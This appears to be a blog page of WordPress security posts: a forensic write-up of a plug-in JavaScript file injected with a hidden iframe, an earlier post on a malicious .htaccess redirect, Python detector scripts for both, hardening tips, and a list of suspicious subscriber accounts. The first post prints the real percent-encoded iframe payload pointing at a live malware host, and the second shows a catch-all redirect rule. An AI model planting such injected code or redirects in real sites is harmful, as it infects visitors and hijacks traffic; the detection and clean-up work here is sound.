Posts Tagged ‘wp’
Follow-up on WordPress .htaccess Hack
In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.
First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.
I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.
During my investigation there was another interesting development that I had just been told about: another user of the same web hosting service was also hacked in a similar way.
So now I was looking into a possible server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites, but that leads us to the issue of the web hosting company making sure it is protecting its users!
I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users. So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)
That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!
I pored over the SQL database dump for over 48 hours (not consecutively) and compared WP files like wp-config.php and such and could not find anything except a strange base64-65 code that I could not isolate.
I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.
I looked at individual plug-in JPG files and uploaded JPG files to see if they were actually pictures or spoofed file names containing actual code. Still nothing.
After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!
Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.
The code resided in a plug-in called I Love Social Bookmarking, and the affected file resided in: wp-content/plugins/i-love-social-bookmarking/includes/
The actual file was named: ilsb.js
The normal ilsb.js file should read:
// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The hacked code within Sam’s file read:
// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function()
        {
            jQuery(".ilsb-child").show();
        },
        function()
        {
            jQuery(".ilsb-child").hide();
        }
    );
    jQuery(".ilsb-parent > a").click(function()
    {
        return false;
    });
});
The offending code is the document.write line, the one that includes all the percent signs (%). The percent-encoding hides what it does from a casual look at the file; the browser decodes it with unescape() before writing it into the page.
This code inserted an iframe (zero width and height, so invisible to the visitor) at the top of the page that pulled in content from a malware site.
Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!
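To help spot this kind of injection when reviewing plug-in files, here is an added Python example (not code from the post or from the plug-in) that finds document.write(unescape(...)) calls in a JavaScript file, decodes the payload the way the browser would, and flags a zero-size iframe. The sample file and the malware.example host are constructed placeholders, not the real incident data.

```python
import re
from urllib.parse import quote, unquote

# Shape of the injected line in the hacked ilsb.js: document.write(unescape('%3C...')).
# Optional whitespace around "." also matches the defanged "document .write" spelling.
DOC_WRITE_RE = re.compile(
    r"document\s*\.\s*write\s*\(\s*unescape\s*\(\s*['\"]([^'\"]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# An iframe declared with width or height of 0 is invisible to the visitor.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?0['\"]?", re.IGNORECASE
)

def js_unescape(text):
    """Decode like JavaScript's unescape(): %uXXXX sequences first, then %XX."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)

def find_injected_writes(js_source):
    """Return one finding per document.write(unescape(...)) call in a JS file,
    with the payload decoded and a flag set when it declares a zero-size iframe."""
    findings = []
    for match in DOC_WRITE_RE.finditer(js_source):
        decoded = js_unescape(match.group(1))
        findings.append({
            "decoded": decoded,
            "hidden_iframe": HIDDEN_IFRAME_RE.search(decoded) is not None,
        })
    return findings

# Constructed sample: the clean ilsb.js, then the same file with an injected
# line that points at a placeholder domain (not the real one from the incident).
CLEAN_JS = """// JavaScript Document
jQuery(document).ready(function()
{
    jQuery(".ilsb-parent").hover(
        function() { jQuery(".ilsb-child").show(); },
        function() { jQuery(".ilsb-child").hide(); }
    );
    jQuery(".ilsb-parent > a").click(function() { return false; });
});
"""
PAYLOAD = quote('<iframe src="http://malware.example/menu.php" width="0" '
                'height="0" frameborder="0"></iframe>', safe="")
HACKED_JS = CLEAN_JS.replace("// JavaScript Document\n",
    "// JavaScript Document\ndocument .write(unescape('%s'));\n" % PAYLOAD)
```

Run find_injected_writes over every .js file under wp-content/plugins and compare against a fresh copy of each plug-in; the clean file produces no findings, the hacked one produces a single finding with hidden_iframe set.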
I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.
But here is your take-away from this experience: secure your WP blog!
- Remove the Admin account by logging in and setting up a new administrator account with a totally different name. Assign it administrator privileges.
- Log out and log back in under the new name.
- Delete the admin account; WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
- Install the Bad Behavior Plug-in and configure it properly. If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!
- Make sure you configure Akismet and get its API key.
- Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet; suffice it to say that I believe spam comments with links may be key in this method.
- Make sure that all users – if you allow them to register – are configured to be subscribers only!
- If you suspect foul play of any sort, search for a hidden user. To do that:
- Click on your Users section.
- Click on the link to the Administrators page.
- Right click on the page and choose: View Source.
- Look for the following code on that source page: tbody id="users". It should be toward the bottom. If you have 1 registered administrator, there should be only one name in that list. If you have 2, there should be only two names, and so on.
- If you find an extra name, you will have to delete that user out of your SQL database.
I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!
TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/773545
And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357
*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!
WP Blog Owners! Check Your .htaccess Files!
Here at MICE, we don’t publicly advertise our security clients because it’s an open invitation to hackers.
However, I do need to tell you that I was recently hired to look over a self-hosted WordPress blog site that had been hacked. I didn’t get to see the actual hacked message, but the client described it as a defacement of the main blog page saying, “You’ve been hacked.”
I am still trying to find out a few minor details from the blog owner to determine how it was actually done, but the .htaccess file had been modified, giving the hacker permission to rewrite all the files on the blog.
As soon as I find out the remaining information, I will post more details including screen shots of the website that the file redirected to.
I have replaced the actual redirect website with Xs in the offending line I found in the .htaccess file because I don’t want anyone going there, but if you see this code, delete it and re-upload the file.
RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]
The R flag stands for Redirect and the L flag means Last, so mod_rewrite stops processing any further rules once this one matches. Because the pattern is .* the rule matches every request, which is why the whole blog was sent to the other site.
You can open the .htaccess file in TextPad or Notepad by right-clicking it and choosing Open With.
More later, but this is your heads up!
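As an added example (not from the post), the following Python script audits an .htaccess file for RewriteRule lines of the shape shown above: an absolute external URL as the target together with the R flag, noting whether the pattern is a catch-all. The sample .htaccess and the redirect.example host are constructed placeholders.

```python
import re

# mod_rewrite syntax: RewriteRule <pattern> <substitution> [<flags>]
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$",
                     re.IGNORECASE)
# Patterns that match every request, as in the injected rule on this page.
CATCH_ALL = {".*", "(.*)", "^.*$", "^(.*)$"}

def audit_htaccess(text):
    """Return one finding per RewriteRule that sends requests to an absolute
    external URL with the R (redirect) flag; a catch-all pattern is noted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = RULE_RE.match(line)
        if not m:
            continue
        pattern, target, raw_flags = m.group(1), m.group(2), m.group(3) or ""
        # Flags may carry values (R=301); keep only the flag name, uppercased.
        flags = sorted({f.strip().split("=", 1)[0].upper()
                        for f in raw_flags.split(",") if f.strip()})
        external = re.match(r"https?://", target, re.IGNORECASE) is not None
        if external and "R" in flags:
            findings.append({"line": lineno, "pattern": pattern, "target": target,
                             "flags": flags, "catch_all": pattern in CATCH_ALL})
    return findings

# Constructed sample: the standard WordPress block followed by a rule of the
# shape shown on the page, with a placeholder host instead of the real one.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteRule .* http://redirect.example/x.cgi?4&parameter=ku [R,L]
"""
```

The standard WordPress rules are never reported because their targets are local paths; only the final line, a catch-all redirect off-site, is flagged.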
WP Hackers At It Again!
WordPress updated its package quite a few days ago, and if you haven’t installed the update yet, you should! The WordPress hackers are on the prowl again!
If you’ve been following our blog tracking the WordPress suspicious subscribers starting with, An Open Note to WordPress Spammers & Hackers, and then, Adding to the WP Hacking Post, you’ll know many people are listing suspicious subscription activity to their WordPress blogs.
Update on suspicious WordPress Subscribers today:
Username: fil452 E-mail: fil452@o2.pl
Username: lif245 E-mail: lif245@o2.pl
Username: adminst E-mail: makilovitalcamader@gmail.com
Anyone else have anything to report?
It’s amazing how these suddenly start appearing directly before an update, or directly after!